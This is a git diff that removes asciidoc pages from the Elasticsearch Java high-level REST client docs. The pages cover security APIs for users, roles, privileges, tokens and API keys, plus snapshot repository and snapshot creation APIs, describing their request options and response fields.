- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-user-privileges.asciidoc b/docs/java-rest/high-level/security/get-user-privileges.asciidoc deleted file mode 100644 index b8051cbfae6..00000000000 --- a/docs/java-rest/high-level/security/get-user-privileges.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ --- -:api: get-user-privileges -:request: GetUserPrivilegesRequest -:response: GetUserPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get User Privileges API - -include::../execution-no-req.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get User Privileges Response - -The returned +{response}+ contains the following properties - -`clusterPrivileges`:: -A `Set` of all _cluster_ privileges that are held by the user. -This will be the union of all the _cluster_ privileges from the user's roles. - -`globalPrivileges`:: -A `Set` of all _global_ privileges that are held by the user. -This will be the union of all the _global_ privileges from the user's roles. -Because this a union of multiple roles, it may contain multiple privileges for -the same `category` and `operation` (which is why is is represented as a `Set` -rather than a single object). - -`indicesPrivileges`:: -A `Set` of all _index_ privileges that are held by the user. -This will be the union of all the _index_ privileges from the user's roles. -Because this a union of multiple roles, it may contain multiple privileges for -the same `index`, and those privileges may have independent field level security -access grants and/or multiple document level security queries. - -`applicationPrivileges`:: -A `Set` of all _application_ privileges that are held by the user. -This will be the union of all the _application_ privileges from the user's roles. - -`runAsPrivilege`:: -A `Set` representation of the _run-as_ privilege that is held by the user. -This will be the union of the _run-as_ privilege from each of the user's roles. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/security/get-users.asciidoc b/docs/java-rest/high-level/security/get-users.asciidoc deleted file mode 100644 index cbd45801fe9..00000000000 --- a/docs/java-rest/high-level/security/get-users.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ - --- -:api: get-users -:request: GetUsersRequest -:response: GetUsersResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Users API - -[id="{upid}-{api}-request"] -==== Get Users Request - -Retrieving a user can be performed using the `security().getUsers()` -method and by setting the username on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -Retrieving multiple users can be performed using the `security().getUsers()` -method and by setting multiple usernames on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-list-request] --------------------------------------------------- - -Retrieving all users can be performed using the `security().getUsers()` -method without specifying any usernames on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-all-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Users Response - -The returned +{response}+ allows getting information about the retrieved users as follows. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/has-privileges.asciidoc b/docs/java-rest/high-level/security/has-privileges.asciidoc deleted file mode 100644 index 7c5f09a171c..00000000000 --- a/docs/java-rest/high-level/security/has-privileges.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ --- -:api: has-privileges -:request: HasPrivilegesRequest -:response: HasPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Has Privileges API - -[id="{upid}-{api}-request"] -==== Has Privileges Request -The +{request}+ supports checking for any or all of the following privilege types: - -* Cluster Privileges -* Index Privileges -* Application Privileges - -Privileges types that you do not wish to check my be passed in as +null+, but as least -one privilege must be specified. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Has Privileges Response - -The returned +{response}+ contains the following properties - -`username`:: -The username (userid) of the current user (for whom the "has privileges" -check was executed) - -`hasAllRequested`:: -`true` if the user has all of the privileges that were specified in the -+{request}+. Otherwise `false`. 
- -`clusterPrivileges`:: -A `Map<String, Boolean>` where each key is the name of one of the cluster -privileges specified in the request, and the value is `true` if the user -has that privilege, and `false` otherwise. -+ -The method `hasClusterPrivilege` can be used to retrieve this information -in a more fluent manner. This method throws an `IllegalArgumentException` -if the privilege was not included in the response (which will be the case -if the privilege was not part of the request). - -`indexPrivileges`:: -A `Map<String, Map<String, Boolean>>` where each key is the name of an -index (as specified in the +{request}+) and the value is a `Map` from -privilege name to a `Boolean`. The `Boolean` value is `true` if the user -has that privilege on that index, and `false` otherwise. -+ -The method `hasIndexPrivilege` can be used to retrieve this information -in a more fluent manner. This method throws an `IllegalArgumentException` -if the privilege was not included in the response (which will be the case -if the privilege was not part of the request). - -`applicationPrivileges`:: -A `Map<String, Map<String, Map<String, Boolean>>>` where each key is the -name of an application (as specified in the +{request}+). -For each application, the value is a `Map` keyed by resource name, with -each value being another `Map` from privilege name to a `Boolean`. -The `Boolean` value is `true` if the user has that privilege on that -resource for that application, and `false` otherwise. -+ -The method `hasApplicationPrivilege` can be used to retrieve this -information in a more fluent manner. This method throws an -`IllegalArgumentException` if the privilege was not included in the -response (which will be the case if the privilege was not part of the -request). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `hasMonitor` will be `true` if the user has the `"monitor"` - cluster privilege. -<2> `hasWrite` will be `true` if the user has the `"write"` - privilege on the `"logstash-2018-10-05"` index. -<3> `hasRead` will be `true` if the user has the `"read"` - privilege on all possible indices that would match - the `"logstash-2018-*"` pattern. - diff --git a/docs/java-rest/high-level/security/invalidate-api-key.asciidoc b/docs/java-rest/high-level/security/invalidate-api-key.asciidoc deleted file mode 100644 index d1f747da882..00000000000 --- a/docs/java-rest/high-level/security/invalidate-api-key.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: invalidate-api-key -:request: InvalidateApiKeyRequest -:response: InvalidateApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Invalidate API Key API - -API Key(s) can be invalidated using this API. - -[id="{upid}-{api}-request"] -==== Invalidate API Key Request -The +{request}+ supports invalidating - -. A specific API key - -. All API keys for a specific realm - -. All API keys for a specific user - -. All API keys for a specific user in a specific realm - -. 
A specific key or all API keys owned by the current authenticated user - -===== Specific API key by API key id -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-key-id-request] --------------------------------------------------- - -===== Specific API key by API key name -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-key-name-request] --------------------------------------------------- - -===== All API keys for realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-realm-api-keys-request] --------------------------------------------------- - -===== All API keys for user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-api-keys-request] --------------------------------------------------- - -===== All API key for user in realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for the current authenticated user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-api-keys-owned-by-authenticated-user-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Invalidate API Key Response - -The returned +{response}+ contains the information regarding the API keys that the request -invalidated. - -`invalidatedApiKeys`:: Available using `getInvalidatedApiKeys` lists the API keys - that this request invalidated. - -`previouslyInvalidatedApiKeys`:: Available using `getPreviouslyInvalidatedApiKeys` lists the API keys - that this request attempted to invalidate - but were already invalid. - -`errors`:: Available using `getErrors` contains possible errors that were encountered while - attempting to invalidate API keys. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/invalidate-token.asciidoc b/docs/java-rest/high-level/security/invalidate-token.asciidoc deleted file mode 100644 index 34969523c7b..00000000000 --- a/docs/java-rest/high-level/security/invalidate-token.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ --- -:api: invalidate-token -:request: InvalidateTokenRequest -:response: InvalidateTokenResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Invalidate Token API - -[id="{upid}-{api}-request"] -==== Invalidate Token Request -The +{request}+ supports invalidating - -. A specific token, that can be either an _access token_ or a _refresh token_ - -. All tokens (both _access tokens_ and _refresh tokens_) for a specific realm - -. All tokens (both _access tokens_ and _refresh tokens_) for a specific user - -. 
All tokens (both _access tokens_ and _refresh tokens_) for a specific user in a specific realm - -===== Specific access token -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-access-token-request] --------------------------------------------------- - -===== Specific refresh token -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-refresh-token-request] --------------------------------------------------- - -===== All tokens for realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-realm-tokens-request] --------------------------------------------------- - -===== All tokens for user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-tokens-request] --------------------------------------------------- - -===== All tokens for user in realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[invalidate-user-realm-tokens-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Invalidate Token Response - -The returned +{response}+ contains the information regarding the tokens that the request -invalidated. - -`invalidatedTokens`:: Available using `getInvalidatedTokens` denotes the number of tokens - that this request invalidated. - -`previouslyInvalidatedTokens`:: Available using `getPreviouslyInvalidatedTokens` denotes - the number of tokens that this request attempted to invalidate - but were already invalid. - -`errors`:: Available using `getErrors` contains possible errors that were encountered while - attempting to invalidate specific tokens. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/put-privileges.asciidoc b/docs/java-rest/high-level/security/put-privileges.asciidoc deleted file mode 100644 index ba8d8878e15..00000000000 --- a/docs/java-rest/high-level/security/put-privileges.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: put-privileges -:request: PutPrivilegesRequest -:response: PutPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Privileges API - -Application privileges can be created or updated using this API. - -[id="{upid}-{api}-request"] -==== Put Privileges Request -A +{request}+ contains list of application privileges that -need to be created or updated. Each application privilege -consists of an application name, application privilege, -set of actions and optional metadata. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Privileges Response - -The returned +{response}+ contains the information about the status -for each privilege present in the +{request}+. 
The status would be -`true` if the privilege was created, `false` if the privilege was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The response contains the status for given application name and -privilege name. The status would be `true` if the privilege was created, -`false` if the privilege was updated. diff --git a/docs/java-rest/high-level/security/put-role-mapping.asciidoc b/docs/java-rest/high-level/security/put-role-mapping.asciidoc deleted file mode 100644 index 819aa776b68..00000000000 --- a/docs/java-rest/high-level/security/put-role-mapping.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-put-role-mapping]] -=== Put Role Mapping API - -[[java-rest-high-security-put-role-mapping-execution]] -==== Execution - -Creating and updating a role mapping can be performed using the `security().putRoleMapping()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute] --------------------------------------------------- - -[[java-rest-high-security-put-role-mapping-response]] -==== Response - -The returned `PutRoleMappingResponse` contains a single field, `created`. This field -serves as an indication if a role mapping was created or if an existing entry was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the role mapping was created or updated - -[[java-rest-high-security-put-role-mapping-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().putRoleMappingAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute-async] --------------------------------------------------- -<1> The `PutRoleMappingRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `PutRoleMappingResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-role-mapping-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/put-role.asciidoc b/docs/java-rest/high-level/security/put-role.asciidoc deleted file mode 100644 index d418375237d..00000000000 --- a/docs/java-rest/high-level/security/put-role.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ - --- -:api: put-role -:request: PutRoleRequest -:response: PutRoleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Role API - -[id="{upid}-{api}-request"] -==== Put Role Request - -The +{request}+ class is used to create or update a role in the Native Roles -Store. The request contains a single role, which encapsulates privileges over -resources. A role can be assigned to a user using the -<<{upid}-put-role-mapping, Put Role Mapping API>>. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Role Response - -The returned +{response}+ contains a single field, `created`. This field -serves as an indication if the role was created or if an existing entry was -updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the role was created or updated diff --git a/docs/java-rest/high-level/security/put-user.asciidoc b/docs/java-rest/high-level/security/put-user.asciidoc deleted file mode 100644 index bca93244175..00000000000 --- a/docs/java-rest/high-level/security/put-user.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: put-user -:request: PutUserRequest -:response: PutUserResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put User API - -[id="{upid}-{api}-request"] -==== Put User Request - -The +{request}+ class is used to create or update a user in the Native Realm. -There are 3 different factory methods for creating a request.
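Before looking at each variant, here is an end-to-end sketch of the first one. It is illustrative only: it assumes an initialized `RestHighLevelClient` named `client`, and the exact `withPassword` signature and `User` constructor shown here are assumptions that may differ between client versions.

["source","java"]
--------------------------------------------------
// Illustrative sketch: create (or update) a user by supplying an explicit password.
// Assumes an initialized RestHighLevelClient `client`; factory signature is an assumption.
User user = new User("example_user", Collections.singletonList("superuser"));
char[] password = "some-long-password".toCharArray();
PutUserRequest request = PutUserRequest.withPassword(user, password, true, RefreshPolicy.NONE); // true = enabled
PutUserResponse response = client.security().putUser(request, RequestOptions.DEFAULT);
System.out.println("created: " + response.isCreated());
--------------------------------------------------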
- -===== Create or Update User with a Password - -If you wish to create a new user (or update an existing user) and directly specify the user's new password, use the -`withPassword` method as shown below: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-password-request] --------------------------------------------------- - -===== Create or Update User with a Hashed Password - -If you wish to create a new user (or update an existing user) and perform password hashing on the client, -then use the `withPasswordHash` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hash-request] --------------------------------------------------- - -===== Update a User without changing their password - -If you wish to update an existing user, and do not wish to change the user's password, -then use the `updateUserProperties` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-update-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put User Response - -The returned `PutUserResponse` contains a single field, `created`. This field -serves as an indication if a user was created or if an existing entry was updated. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[put-user-response] --------------------------------------------------- -<1> `created` is a boolean indicating whether the user was created or updated diff --git a/docs/java-rest/high-level/snapshot/create_repository.asciidoc b/docs/java-rest/high-level/snapshot/create_repository.asciidoc deleted file mode 100644 index 5c545292097..00000000000 --- a/docs/java-rest/high-level/snapshot/create_repository.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[java-rest-high-snapshot-create-repository]] -=== Snapshot Create Repository API - -The Snapshot Create Repository API allows you to register a snapshot repository. - -[[java-rest-high-snapshot-create-repository-request]] -==== Snapshot Create Repository Request - -A `PutRepositoryRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request] --------------------------------------------------- - -==== Repository Settings -Settings requirements will differ based on the repository backend chosen.
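For example, a shared file system (`fs`) repository typically only needs a `location` (which must be registered under `path.repo` on every node) plus optional flags such as `compress`. A hedged sketch, assuming an initialized `RestHighLevelClient` named `client` and placeholder names:

["source","java"]
--------------------------------------------------
// Illustrative sketch: register an "fs" repository with minimal settings.
// Assumes an initialized RestHighLevelClient `client`; names and paths are placeholders.
PutRepositoryRequest request = new PutRepositoryRequest("my_repository");
request.type("fs");
request.settings(Settings.builder()
        .put("location", "mount/backups/my_backup") // must be listed in path.repo on every node
        .put("compress", true));
boolean acknowledged = client.snapshot()
        .createRepository(request, RequestOptions.DEFAULT)
        .isAcknowledged();
--------------------------------------------------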
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-repository-settings] --------------------------------------------------- -<1> Sets the repository settings - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-create-settings] --------------------------------------------------- -<1> Settings provided as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Required Arguments -The following arguments must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-name] --------------------------------------------------- -<1> The name of the repository - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-type] --------------------------------------------------- -<1> The type of the repository - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-verify] --------------------------------------------------- -<1> Verify after creation as a `Boolean` - -[[java-rest-high-snapshot-create-repository-sync]] -==== Synchronous Execution - 
-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-create-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a repository put settings requires both the -`PutRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute-async] --------------------------------------------------- -<1> The `PutRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-snapshot-create-repository-response]] -==== Snapshot Create RepositoryResponse - -The returned `PutRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc deleted file mode 100644 index 971a6ee4867..00000000000 --- a/docs/java-rest/high-level/snapshot/create_snapshot.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[java-rest-high-snapshot-create-snapshot]] -=== Create Snapshot API - -Use the Create Snapshot API to create a new snapshot. - -[[java-rest-high-snapshot-create-snapshot-request]] -==== Create Snapshot Request - -A `CreateSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request] --------------------------------------------------- - -==== Required Arguments -The following arguments are mandatory: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-repositoryName] --------------------------------------------------- -<1> The name of the repository. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-snapshotName] --------------------------------------------------- -<1> The name of the snapshot. - -==== Optional Arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-indices] --------------------------------------------------- -<1> A list of indices the snapshot is applied to. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-indicesOptions] --------------------------------------------------- -<1> Options applied to the indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-partial] --------------------------------------------------- -<1> Set `partial` to `true` to allow a successful snapshot without the -availability of all the indices primary shards. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-includeGlobalState] --------------------------------------------------- -<1> Set `includeGlobalState` to `false` to prevent writing the cluster's global -state as part of the snapshot. Defaults to `true`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. -<2> Timeout to connect to the master node as a `String`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-request-waitForCompletion] --------------------------------------------------- -<1> Waits for the snapshot to be completed before a response is returned. - -[[java-rest-high-snapshot-create-snapshot-sync]] -==== Synchronous Execution - -Execute a `CreateSnapshotRequest` synchronously to receive a `CreateSnapshotResponse`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute] --------------------------------------------------- - -Retrieve the `SnapshotInfo` from a `CreateSnapshotResponse` when the snapshot is fully created. -(The `waitForCompletion` parameter is `true`). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-response-snapshot-info] --------------------------------------------------- -<1> The `SnapshotInfo` object. 
- -[[java-rest-high-snapshot-create-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a create snapshot request requires both the -`CreateSnapshotRequest` instance and an `ActionListener` instance to be -passed as arguments to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute-async] --------------------------------------------------- -<1> The `CreateSnapshotRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back with the `onResponse` method -if the execution is successful or the `onFailure` method if the execution -failed. - -A typical listener for `CreateSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an -argument. - -[[java-rest-high-snapshot-create-snapshot-response]] -==== Snapshot Create Response - -Use the `CreateSnapshotResponse` to retrieve information about the evaluated -request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-snapshot-response] --------------------------------------------------- -<1> Indicates the node has started the request. diff --git a/docs/java-rest/high-level/snapshot/delete_repository.asciidoc b/docs/java-rest/high-level/snapshot/delete_repository.asciidoc deleted file mode 100644 index e88535f2362..00000000000 --- a/docs/java-rest/high-level/snapshot/delete_repository.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[java-rest-high-snapshot-delete-repository]] -=== Snapshot Delete Repository API - -The Snapshot Delete Repository API allows to delete a registered repository. 
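For orientation, an end-to-end sketch follows (assuming an initialized `RestHighLevelClient` named `client`); note that deleting a repository only removes its registration, not the snapshot data it points to.

["source","java"]
--------------------------------------------------
// Illustrative sketch: remove the repository registration named "my_repository".
// Assumes an initialized RestHighLevelClient `client`.
DeleteRepositoryRequest request = new DeleteRepositoryRequest("my_repository");
boolean acknowledged = client.snapshot()
        .deleteRepository(request, RequestOptions.DEFAULT)
        .isAcknowledged();
--------------------------------------------------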
- -[[java-rest-high-snapshot-delete-repository-request]] -==== Snapshot Delete Repository Request - -A `DeleteRepositoryRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-delete-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-delete-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a snapshot delete repository requires both the -`DeleteRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute-async] --------------------------------------------------- -<1> The `DeleteRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. 
